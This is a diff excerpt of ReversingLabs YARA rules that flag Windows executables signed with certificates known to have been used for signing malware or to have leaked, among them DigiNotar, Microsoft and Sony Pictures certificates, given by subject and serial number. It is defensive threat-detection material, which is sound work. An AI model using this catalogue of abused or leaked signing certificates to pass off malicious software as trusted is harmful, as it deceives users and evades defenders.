-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7922-L7938"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L891-L907"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10279,21 +34944,21 @@ rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:2c:af" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "8415406b-ede8-5404-8208-34eb649f7325"
+		id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7940-L7958"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L909-L925"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10303,21 +34968,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and ( pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures [ i ] . serial == "ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" ) and 1608640280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:3c:c9" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f"
+		id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7960-L7976"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L927-L943"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10327,21 +34992,21 @@ rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA G2" and pe.signatures [ i ] . serial == "0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7"
+		id = "dd19b988-747d-55b9-825b-2ada1ca83691"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7978-L7996"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L945-L961"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10351,21 +35016,21 @@ rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and ( pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures [ i ] . serial == "a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" ) and 1606867200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Services 1024 CA" and pe.signatures [ i ] . serial == "46:9c:2c:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "32cefe84-b305-5542-a5d3-1832dcbf6d61"
+		id = "beb2039c-3b0e-5649-96ca-40175493e62c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7998-L8014"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L963-L979"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10375,21 +35040,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID - (Enrich)" and pe.signatures [ i ] . serial == "4c:0e:63:6a" and 1320191999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c"
+		id = "15ad6936-78a4-58b1-8c68-27ec4ed38649"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8016-L8034"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L981-L997"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10399,21 +35064,21 @@ rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and ( pe.signatures [ i ] . serial == "00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" ) and 1606089600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID (Enrich)" and pe.signatures [ i ] . serial == "07:27:14:a9" and 1320191999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "453b5da2-ae26-5005-8a56-1105a960fde6"
+		id = "2c051732-76d7-5562-a79e-c5bbdc8373b2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8036-L8052"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L999-L1017"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10423,21 +35088,21 @@ rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "global trustee" and ( pe.signatures [ i ] . serial == "00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures [ i ] . serial == "d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" ) and 1300060800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81"
+		id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8054-L8070"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1019-L1035"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10447,21 +35112,21 @@ rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "93ca450e-7278-5c6c-aba8-e90728570e0c"
+		id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8072-L8090"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1037-L1053"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10471,21 +35136,21 @@ rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and ( pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures [ i ] . serial == "d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" ) and 1607558400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "70fc063e-f032-5e63-ae53-65a25d5a29c3"
+		id = "e192d271-b5de-5acc-a04f-02a26d9231ac"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8092-L8108"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1055-L1072"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10495,21 +35160,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and ( pe.signatures [ i ] . serial == "00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures [ i ] . serial == "eb:aa:11:d6:2e:24:81:08:18:20" ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "4aedeb77-181b-5422-bec4-93c84412bae4"
+		id = "c6334520-7f93-59d0-8a22-721b928c14d1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8110-L8128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1074-L1089"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10519,21 +35184,21 @@ rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and ( pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures [ i ] . serial == "d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" ) and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures [ i ] . serial == "3a:ab:11:de:e5:2f:1b:19:d0:56" )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6"
+		id = "b98769c6-805e-5cd0-96f1-67418fec40a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8130-L8148"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1091-L1106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10543,21 +35208,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) and 1612915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures [ i ] . serial == "61:02:b0:19:00:00:00:00:00:2f" )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "79989b9b-60e4-577d-97e2-cb447c38baf3"
+		id = "00effc8a-066c-54ff-891e-c635d161b171"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8150-L8166"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1108-L1124"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10567,21 +35232,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sony Pictures Entertainment Inc." and pe.signatures [ i ] . serial == "01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7"
+		id = "14ad79c7-f669-59a6-94d1-978a13fbb337"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8168-L8184"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
